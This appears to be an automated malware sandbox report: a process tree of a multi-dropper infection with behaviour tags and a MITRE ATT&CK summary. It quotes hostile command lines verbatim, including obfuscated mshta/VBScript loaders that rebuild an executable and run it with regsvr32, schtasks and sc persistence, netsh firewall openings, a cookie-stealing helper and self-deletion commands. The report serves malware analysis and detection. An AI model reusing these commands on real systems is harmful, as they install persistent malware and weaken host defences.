C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
PID:6036 -
C:\Windows\SysWOW64\rUNdlL32.eXe"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",shl4⤵
- Loads dropped DLL
- Modifies registry class
PID:5064
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:6056
-
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
PID:6048 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:3260
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:4564
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:3856
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5768
-
-
-
C:\Program Files (x86)\Company\NewProduct\file4.exe"C:\Program Files (x86)\Company\NewProduct\file4.exe"3⤵PID:6008
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS86AB0114\arnatic_7.exeC:\Users\Admin\AppData\Local\Temp\7zS86AB0114\arnatic_7.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2444
-
C:\Users\Admin\AppData\Local\Temp\7zS86AB0114\arnatic_2.exearnatic_2.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:728
-
C:\Users\Admin\AppData\Local\Temp\7zS86AB0114\arnatic_3.exearnatic_3.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3388 -
C:\Windows\SysWOW64\rUNdlL32.eXe"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub2⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2136
-
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4716
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:1860
-
C:\Users\Admin\AppData\Local\Temp\1E8B.exeC:\Users\Admin\AppData\Local\Temp\1E8B.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6120
-
C:\Users\Admin\AppData\Local\Temp\2AD0.exeC:\Users\Admin\AppData\Local\Temp\2AD0.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4148
-
C:\Users\Admin\AppData\Local\Temp\383F.exeC:\Users\Admin\AppData\Local\Temp\383F.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4068 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\383F.exe"2⤵PID:4292
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:6008
-
-
-
C:\Users\Admin\AppData\Local\Temp\4417.exeC:\Users\Admin\AppData\Local\Temp\4417.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:800
-
C:\Users\Admin\AppData\Local\Temp\5A11.exeC:\Users\Admin\AppData\Local\Temp\5A11.exe1⤵
- Executes dropped EXE
PID:6060 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 1 /tn "Videocard Service" /tr "C:\Users\Admin\AppData\Local\Temp\5A11.exe" /f2⤵
- Creates scheduled task(s)
PID:5728
-
-
C:\Users\Admin\AppData\Local\Temp\62FB.exeC:\Users\Admin\AppData\Local\Temp\62FB.exe1⤵
- Executes dropped EXE
PID:1676
-
C:\Users\Admin\AppData\Local\Temp\6F60.exeC:\Users\Admin\AppData\Local\Temp\6F60.exe1⤵
- Executes dropped EXE
PID:3336
-
C:\Users\Admin\AppData\Local\Temp\7BF4.exeC:\Users\Admin\AppData\Local\Temp\7BF4.exe1⤵
- Executes dropped EXE
PID:4540
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3020
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:3740
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:3908
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:5744
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5928
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:4152
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:5064
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵
- Suspicious behavior: MapViewOfSection
PID:1040
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4652
-
C:\Users\Admin\AppData\Local\Temp\334E.exeC:\Users\Admin\AppData\Local\Temp\334E.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5948 -
C:\Users\Admin\AppData\Local\Temp\334E.exeC:\Users\Admin\AppData\Local\Temp\334E.exe2⤵
- Adds Run key to start application
PID:5968 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\c187b9e1-d6ac-4570-8fc3-427f363e5fcc" /deny *S-1-1-0:(OI)(CI)(DE,DC)3⤵
- Modifies file permissions
PID:4176
-
-
C:\Users\Admin\AppData\Local\Temp\334E.exe"C:\Users\Admin\AppData\Local\Temp\334E.exe" --Admin IsNotAutoStart IsNotTask3⤵
- Suspicious use of SetThreadContext
PID:676 -
C:\Users\Admin\AppData\Local\Temp\334E.exe"C:\Users\Admin\AppData\Local\Temp\334E.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Modifies extensions of user files
PID:2892
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3999.exeC:\Users\Admin\AppData\Local\Temp\3999.exe1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4124 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\lfeexejk\2⤵PID:5836
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\irgbnmtd.exe" C:\Windows\SysWOW64\lfeexejk\2⤵PID:5736
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create lfeexejk binPath= "C:\Windows\SysWOW64\lfeexejk\irgbnmtd.exe /d\"C:\Users\Admin\AppData\Local\Temp\3999.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:3948
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description lfeexejk "wifi internet conection"2⤵PID:5712
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start lfeexejk2⤵PID:3092
-
-
C:\Users\Admin\wxdmxthp.exe"C:\Users\Admin\wxdmxthp.exe" /d"C:\Users\Admin\AppData\Local\Temp\3999.exe"2⤵PID:4924
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\jtojaatz.exe" C:\Windows\SysWOW64\lfeexejk\3⤵PID:6104
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config lfeexejk binPath= "C:\Windows\SysWOW64\lfeexejk\jtojaatz.exe /d\"C:\Users\Admin\wxdmxthp.exe\""3⤵PID:2184
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start lfeexejk3⤵PID:4772
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵PID:5960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0512.bat" "3⤵PID:5876
-
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:5796
-
-
C:\Users\Admin\AppData\Local\Temp\69D2.exeC:\Users\Admin\AppData\Local\Temp\69D2.exe1⤵
- Executes dropped EXE
PID:4836 -
C:\Users\Admin\AppData\Local\Temp\69D2.exe"C:\Users\Admin\AppData\Local\Temp\69D2.exe"2⤵PID:6136
-
-
C:\Users\Admin\AppData\Local\Temp\872E.exeC:\Users\Admin\AppData\Local\Temp\872E.exe1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1752
-
C:\Users\Admin\AppData\Local\Temp\8F9B.exeC:\Users\Admin\AppData\Local\Temp\8F9B.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4632 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 8F9B.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\8F9B.exe" & del C:\ProgramData\*.dll & exit2⤵PID:5324
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5468
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 8F9B.exe /f3⤵
- Kills process with taskkill
PID:4492
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:1376
-
-
-
C:\Users\Admin\AppData\Local\Temp\A008.exeC:\Users\Admin\AppData\Local\Temp\A008.exe1⤵PID:4700
-
C:\Users\Admin\AppData\Local\Temp\is-UE77B.tmp\A008.tmp"C:\Users\Admin\AppData\Local\Temp\is-UE77B.tmp\A008.tmp" /SL5="$301DE,506127,422400,C:\Users\Admin\AppData\Local\Temp\A008.exe"2⤵PID:908
-
C:\Users\Admin\AppData\Local\Temp\is-F89RU.tmp\dqksjhàà(àç.exe"C:\Users\Admin\AppData\Local\Temp\is-F89RU.tmp\dqksjhàà(àç.exe" /S /UID=rec73⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:3324 -
C:\Program Files\Windows NT\AMKXIJNLTQ\irecord.exe"C:\Program Files\Windows NT\AMKXIJNLTQ\irecord.exe" /VERYSILENT4⤵PID:5920
-
C:\Users\Admin\AppData\Local\Temp\is-0PR4T.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-0PR4T.tmp\irecord.tmp" /SL5="$202BE,6139911,56832,C:\Program Files\Windows NT\AMKXIJNLTQ\irecord.exe" /VERYSILENT5⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:412 -
C:\Program Files (x86)\recording\i-record.exe"C:\Program Files (x86)\recording\i-record.exe" -silent -desktopShortcut -programMenu6⤵
- Loads dropped DLL
PID:4544
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1b-a15d3-179-66985-985400ac56f61\Juxapivowae.exe"C:\Users\Admin\AppData\Local\Temp\1b-a15d3-179-66985-985400ac56f61\Juxapivowae.exe"4⤵
- Checks computer location settings
PID:6016
-
-
C:\Users\Admin\AppData\Local\Temp\6f-56385-1b1-67283-085ed03c7529c\Gutoshehishy.exe"C:\Users\Admin\AppData\Local\Temp\6f-56385-1b1-67283-085ed03c7529c\Gutoshehishy.exe"4⤵PID:1968
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ABFF.exeC:\Users\Admin\AppData\Local\Temp\ABFF.exe1⤵PID:4636
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: Close( CREATEOBject ( "WscRIPT.ShELL"). RUN ( "CMD /Q /c TYpE ""C:\Users\Admin\AppData\Local\Temp\ABFF.exe"" > ..\O5G~YGI.EXe &&sTaRT ..\O5g~YGI.Exe -PkmgBRfy~iqG1d &if """"=="""" for %C in ( ""C:\Users\Admin\AppData\Local\Temp\ABFF.exe"" ) do taskkill /im ""%~NXC"" /F " ,0 ,True ))2⤵PID:4864
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYpE "C:\Users\Admin\AppData\Local\Temp\ABFF.exe" > ..\O5G~YGI.EXe &&sTaRT ..\O5g~YGI.Exe -PkmgBRfy~iqG1d &if ""=="" for %C in ( "C:\Users\Admin\AppData\Local\Temp\ABFF.exe" ) do taskkill /im "%~NXC" /F3⤵PID:1516
-
C:\Users\Admin\AppData\Local\Temp\O5G~YGI.EXe..\O5g~YGI.Exe -PkmgBRfy~iqG1d4⤵PID:228
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: Close( CREATEOBject ( "WscRIPT.ShELL"). RUN ( "CMD /Q /c TYpE ""C:\Users\Admin\AppData\Local\Temp\O5G~YGI.EXe"" > ..\O5G~YGI.EXe &&sTaRT ..\O5g~YGI.Exe -PkmgBRfy~iqG1d &if ""-PkmgBRfy~iqG1d ""=="""" for %C in ( ""C:\Users\Admin\AppData\Local\Temp\O5G~YGI.EXe"" ) do taskkill /im ""%~NXC"" /F " ,0 ,True ))5⤵PID:2644
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYpE "C:\Users\Admin\AppData\Local\Temp\O5G~YGI.EXe" > ..\O5G~YGI.EXe &&sTaRT ..\O5g~YGI.Exe -PkmgBRfy~iqG1d &if "-PkmgBRfy~iqG1d "=="" for %C in ( "C:\Users\Admin\AppData\Local\Temp\O5G~YGI.EXe" ) do taskkill /im "%~NXC" /F6⤵PID:4660
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: CLoSe( creATEOBjECT("WSCRipt.sHEll" ).RUN("CMD.eXE /q /c EchO | sET /p = ""MZ"" >fSZFXGIh.6E5 & cOpy /Y /b FSZFXGIH.6E5 + 9nS3MpMF.c_ + 7zTI.ToG +FUJSu6Z9.OXP +TGA6SM.I + E6uu.Yr ..\Pey9.WY & sTarT regsvr32 ..\PEY9.wY /s &dEL /q * " , 0, TRUe ))5⤵PID:4072
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c EchO | sET /p = "MZ" >fSZFXGIh.6E5&cOpy /Y /b FSZFXGIH.6E5+ 9nS3MpMF.c_+7zTI.ToG +FUJSu6Z9.OXP +TGA6SM.I+ E6uu.Yr ..\Pey9.WY & sTarT regsvr32 ..\PEY9.wY /s &dEL /q *6⤵PID:708
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EchO "7⤵PID:3568
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /p = "MZ" 1>fSZFXGIh.6E5"7⤵PID:2352
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 ..\PEY9.wY /s7⤵PID:4104
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "ABFF.exe" /F4⤵
- Kills process with taskkill
PID:5468
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4996
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4420
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:3412
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:6064
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:3280 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3280 -s 23402⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4104
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:3568
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:2548
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:1836 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1836 -s 17682⤵
- Program crash
PID:4088
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:1956
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:2168
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4828
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1708
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:1172
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5324
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5596
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:4872
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:2744
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:3688
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:360
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
2New Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1File and Directory Permissions Modification
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1